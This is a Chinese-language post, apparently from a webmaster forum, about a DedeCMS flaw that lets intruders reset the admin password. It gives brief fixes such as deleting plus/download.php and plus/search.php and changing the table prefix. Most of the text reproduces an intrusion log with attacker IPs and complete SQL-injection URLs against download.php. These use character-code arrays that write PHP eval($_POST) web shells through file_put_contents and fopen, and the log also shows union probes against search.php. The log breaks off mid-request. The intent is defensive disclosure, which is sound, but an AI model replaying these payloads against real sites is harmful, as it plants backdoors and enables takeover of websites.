dedecms后台用户名不存在,用户名密码被修改,spider,最新漏洞轻松改后台密码而破门而入.
dede后台忽然无法登录提示用户名不存在?织梦最新漏洞攻击处理方法
如果已经发现/data,有很长一个txt记事本,说明已经被其他人SQL注入了,或是已经有人进行尝试SQL注入了了。
记事儿本如:5dfaaed91f3cbdd09d12268ef2ad3556_safe.txt这样的。
怎么注入的,这边就不讲述了,以免危害到脆弱的站长们,眼睁睁看着站长被害,也不情愿,大家都赶紧升级打补丁吧,
最直接的解决方法就是:直接把plus/download.php,/plus/search.php
文件是直接删除就解决了,因为很多程序都是通过搜索SQL而注入了,下载不用的不受影响.
解决SQL注入,很必要的方法,请不要使用dedecms默认的前缀,极不安全,请将默认前缀 dede_ 修改为其它如 hubei_
其实怎么注入的,大家查的那个/data/下面的 **_safe.txt 记录就可以看到
已有公开的注入方式,成功之后,直接在后台使用spider这个用户名,用密码admin登录.
密码被修改怎么改回去? 请参考:http://hubeidc.com/idc/201101/09146.html
官方发布的DedeCMS后台密码更改工具-dede后台管理员密码丢失
为考虑到普通站长利益,只公开/data/5dfaaed91f3cbdd09d12268ef2ad3556_safe.txt
文件的内容,希望那些干坏事的人,也把坏事干到正当的地方.
211.49.99.17||/plus/search.php?keyword=asd&typeArr[%20uNion%20]=a||SELECT
channeltype FROM `dede_arctype` WHERE id= uNion LIMIT 0,1;||union detect
211.49.99.17||/plus/search.php?keyword=asd&typeArr[%20uNion%20]=a||SELECT
channeltype FROM `dede_arctype` WHERE id= uNion LIMIT 0,1;||union detect
110.52.204.91||//plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]%20=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]%20=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]%20=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]%20=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]%20=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]%20=61&arrs2[]=32&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]%20=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]%20=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]%20=83&arrs2[]=84&arrs2[]=91&arrs2[]=109&arrs2[]=93&arrs2[]=41&arrs2[]%20=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]%20=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]%20=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]%20=49&arrs2[]=32&arrs2[]=35||
INSERT INTO `dede_myad` SET `normbody` = ‘’ WHERE `aid`
=1 #downloads`(`hash`,`id`,`downloads`)
VALUES(‘d41d8cd98f00b204e9800998ecf8427e’,’0′,1); ||comment detect
110.52.204.91||//plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=109&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=50&arrs2[]=32&arrs2[]=35||
INSERT INTO `dede_myad` SET `normbody` = ‘’ WHERE `aid`
=2 #downloads`(`hash`,`id`,`downloads`)
VALUES(‘d41d8cd98f00b204e9800998ecf8427e’,’0′,1); ||comment detect
110.52.204.91||///plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=109&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=51&arrs2[]=32&arrs2[]=35||
INSERT INTO `dede_myad` SET `normbody` = ‘’ WHERE `aid`
=3 #downloads`(`hash`,`id`,`downloads`)
VALUES(‘d41d8cd98f00b204e9800998ecf8427e’,’0′,1); ||comment detect
110.52.204.91||//plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=48&arrs2[]=102&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=99&arrs2[]=109&arrs2[]=100&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=76&arrs2[]=73&arrs2[]=77&arrs2[]=73&arrs2[]=84&arrs2[]=32&arrs2[]=49&arrs2[]=32&arrs2[]=35||
INSERT INTO `dede_mytag` SET `normbody` = ‘{dede:php}file_put_contents(”0f.php”,”
eval($_POST[cmd]);?>”);{/dede:php}’ WHERE `aid` =1 LIMIT 1 #downloads`(`hash`,`id`,`downloads`)
VALUES(‘d41d8cd98f00b204e9800998ecf8427e’,’0′,1); ||comment detect
58.218.204.48||/plus/download.php?open=1&arrs1%5B%5D=99&arrs1%5B%5D=102&arrs1%5B%5D=103&arrs1%5B%5D=95&arrs1%5B%5D=100&arrs1%5B%5D=98&arrs1%5B%5D=112&arrs1%5B%5D=114&arrs1%5B%5D=101&arrs1%5B%5D=102&arrs1%5B%5D=105&arrs1%5B%5D=120&arrs2%5B%5D=109&arrs2%5B%5D=121&arrs2%5B%5D=116&arrs2%5B%5D=97&arrs2%5B%5D=103&arrs2%5B%5D=96&arrs2%5B%5D=32&arrs2%5B%5D=83&arrs2%5B%5D=69&arrs2%5B%5D=84&arrs2%5B%5D=32&arrs2%5B%5D=96&arrs2%5B%5D=110&arrs2%5B%5D=111&arrs2%5B%5D=114&arrs2%5B%5D=109&arrs2%5B%5D=98&arrs2%5B%5D=111&arrs2%5B%5D=100&arrs2%5B%5D=121&arrs2%5B%5D=96&arrs2%5B%5D=32&arrs2%5B%5D=61&arrs2%5B%5D=32&arrs2%5B%5D=39&arrs2%5B%5D=111&arrs2%5B%5D=107&arrs2%5B%5D=100&arrs2%5B%5D=60&arrs2%5B%5D=63&arrs2%5B%5D=112&arrs2%5B%5D=104&arrs2%5B%5D=112&arrs2%5B%5D=32&arrs2%5B%5D=101&arrs2%5B%5D=118&arrs2%5B%5D=97&arrs2%5B%5D=108&arrs2%5B%5D=40&arrs2%5B%5D=36&arrs2%5B%5D=95&arrs2%5B%5D=80&arrs2%5B%5D=79&arrs2%5B%5D=83&arrs2%5B%5D=84&arrs2%5B%5D=91&arrs2%5B%5D=104&arrs2%5B%5D=100&arrs2%5B%5D=93&arrs2%5B%5D=41&arrs2%5B%5D=59&arrs2%5B%5D=63&arrs2%5B%5D=62&arrs2%5B%5D=39&arrs2%5B%5D=32&arrs2%5B%5D=87&arrs2%5B%5D=72&arrs2%5B%5D=69&arrs2%5B%5D=82&arrs2%5B%5D=69&arrs2%5B%5D=32&arrs2%5B%5D=96&arrs2%5B%5D=97&arrs2%5B%5D=105&arrs2%5B%5D=100&arrs2%5B%5D=96&arrs2%5B%5D=32&arrs2%5B%5D=61&arrs2%5B%5D=49&arrs2%5B%5D=32&arrs2%5B%5D=35||
INSERT INTO `dede_mytag` SET `normbody` = ‘okd’ WHERE
`aid` =1 #downloads`(`hash`,`id`,`downloads`)
VALUES(‘d41d8cd98f00b204e9800998ecf8427e’,’0′,1); ||comment detect
118.251.146.245||/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=32&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=61&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=64&arrs2[]=102&arrs2[]=111&arrs2[]=112&arrs2[]=101&arrs2[]=110&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=102&arrs2[]=108&arrs2[]=101&arrs2[]=110&arrs2[]=107&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=97&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=119&arrs2[]=114&arrs2[]=105&arrs2[]=116&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=44&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=57&arrs2[]=53&arrs2[]=50&arrs2[]=55&arrs2[]=93&arrs2[]=41&arrs2[]=32&arrs2[]=63&arrs2[]=62&arrs2[]=97&arrs2[]=121&arrs2[]=121&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=79&arrs2[]=75&arrs2[]=39&arrs2[]=39&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=99&arrs2[]=108&arrs2[]=111&arrs2[]=115&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35&||
INSERT INTO `dede_myad` SET normbody=’
”ayy”);echo ”OK”;@fclose($fp);?>’ where aid =1 #downloads`(`hash`,`id`,`downloads`)
VALUES(‘d41d8cd98f00b204e9800998ecf8427e’,’0′,1); ||comment detect
61.178.131.72||/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=32&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=61&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=64&arrs2[]=102&arrs2[]=111&arrs2[]=112&arrs2[]=101&arrs2[]=110&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=97&arrs2[]=118&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=97&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=119&arrs2[]=114&arrs2[]=105&arrs2[]=116&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=44&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=49&arrs2[]=49&arrs2[]=48&arrs2[]=93&arrs2[]=41&arrs2[]=32&arrs2[]=63&arrs2[]=62&arrs2[]=97&arrs2[]=120&arrs2[]=120&arrs2[]=120&arrs2[]=120&arrs2[]=120&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=79&arrs2[]=75&arrs2[]=39&arrs2[]=39&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=99&arrs2[]=108&arrs2[]=111&arrs2[]=115&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35&||
INSERT INTO `dede_myad` SET normbody=’
”axxxxx”);echo ”OK”;@fclose($fp);?>’ where aid =1
#downloads`(`hash`,`id`,`downloads`)
VALUES(‘d41d8cd98f00b204e9800998ecf8427e’,’0′,1); ||comment detect
118.186.252.69||/plus/search.php?keyword=as&typeArr%5B%20uNion%20%5D=a||SELECT
channeltype FROM `dede_arctype` WHERE id= uNion LIMIT 0,1;||union detect
222.242.100.89||/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=32&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=61&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=64&arrs2[]=102&arrs2[]=111&arrs2[]=112&arrs2[]=101&arrs2[]=110&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=97&arrs2[]=118&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=97&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=119&arrs2[]=114&arrs2[]=105&arrs2[]=116&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=44&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=49&arrs2[]=49&arrs2[]=48&arrs2[]=93&arrs2[]=41&arrs2[]=32&arrs2[]=63&arrs2[]=62&arrs2[]=97&arrs2[]=120&arrs2[]=120&arrs2[]=120&arrs2[]=120&arrs2[]=120&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=79&arrs2[]=75&arrs2[]=39&arrs2[]=39&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=99&arrs2[]=108&arrs2[]=111&arrs2[]=115&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35&||
INSERT INTO `dede_myad` SET normbody=’
”axxxxx”);echo ”OK”;@fclose($fp);?>’ where aid =1
#downloads`(`hash`,`id`,`downloads`)
VALUES(‘d41d8cd98f00b204e9800998ecf8427e’,’0′,1); ||comment detect
58.215.172.215||/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=32&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=61&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=64&arrs2[]=102&arrs2[]=111&arrs2[]=112&arrs2[]=101&arrs2[]=110&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=119&arrs2[]=97&arrs2[]=112&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=97&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=119&arrs2[]=114&arrs2[]=105&arrs2[]=116&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=44&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=97&arrs2[]=93&arrs2[]=41&arrs2[]=32&arrs2[]=63&arrs2[]=62&arrs2[]=102&arrs2[]=117&arrs2[]=99&arrs2[]=107&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=79&arrs2[]=75&arrs2[]=39&arrs2[]=39&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=99&arrs2[]=108&arrs2[]=111&arrs2[]=115&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35&||
INSERT INTO `dede_myad` SET normbody=’
”fuck”);echo ”OK”;@fclose($fp);?>’ where aid =1 #downloads`(`hash`,`id`,`downloads`)
VALUES(‘d41d8cd98f00b204e9800998ecf8427e’,’0′,1); ||comment detect
61.178.131.72||/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=32&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=61&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=64&arrs2[]=102&arrs2[]=111&arrs2[]=112&arrs2[]=101&arrs2[]=110&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=97&arrs2[]=118&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=97&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=119&arrs2[]=114&arrs2[]=105&arrs2[]=116&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=44&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=49&arrs2[]=49&arrs2[]=48&arrs2[]=93&arrs2[]=41&arrs2[]=32&arrs2[]=63&arrs2[]=62&arrs2[]=97&arrs2[]=120&arrs2[]=120&arrs2[]=120&arrs2[]=120&arrs2[]=120&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=79&arrs2[]=75&arrs2[]=39&arrs2[]=39&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=99&arrs2[]=108&arrs2[]=111&arrs2[]=115&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35&||
INSERT INTO `dede_myad` SET normbody=’
”axxxxx”);echo ”OK”;@fclose($fp);?>’ where aid =1
#downloads`(`hash`,`id`,`downloads`)
VALUES(‘d41d8cd98f00b204e9800998ecf8427e’,’0′,1); ||comment detect
183.130.119.248||/plus/search.php?keyword=as&typeArr%5B%20uNion%20%5D=a||SELECT
channeltype FROM `dede_arctype` WHERE id= uNion LIMIT 0,1;||union detect
42.96.166.217||//plus/download.php?open=1&arrs1%5B%5D=99&arrs1%5B%5D=102&arrs1%5B%5D=103&arrs1%5B%5D=95&arrs1%5B%5D=100&arrs1%5B%5D=98&arrs1%5B%5D=112&arrs1%5B%5D=114&arrs1%5B%5D=101&arrs1%5B%5D=102&arrs1%5B%5D=105&arrs1%5B%5D=120&arrs2%5B%5D=109&arrs2%5B%5D=121&arrs2%5B%5D=97&arrs2%5B%5D=100&arrs2%5B%5D=96&arrs2%5B%5D=32&arrs2%5B%5D=83&arrs2%5B%5D=69&arrs2%5B%5D=84&arrs2%5B%5D=32&arrs2%5B%5D=96&arrs2%5B%5D=110&arrs2%5B%5D=111&arrs2%5B%5D=114&arrs2%5B%5D=109&arrs2%5B%5D=98&arrs2%5B%5D=111&arrs2%5B%5D=100&arrs2%5B%5D=121&arrs2%5B%5D=96&arrs2%5B%5D=32&arrs2%5B%5D=61&arrs2%5B%5D=32&arrs2%5B%5D=39&arrs2%5B%5D=60&arrs2%5B%5D=63&arrs2%5B%5D=112&arrs2%5B%5D=104&arrs2%5B%5D=112&arrs2%5B%5D=32&arrs2%5B%5D=102&arrs2%5B%5D=105&arrs2%5B%5D=108&arrs2%5B%5D=101&arrs2%5B%5D=95&arrs2%5B%5D=112&arrs2%5B%5D=117&arrs2%5B%5D=116&arrs2%5B%5D=95&arrs2%5B%5D=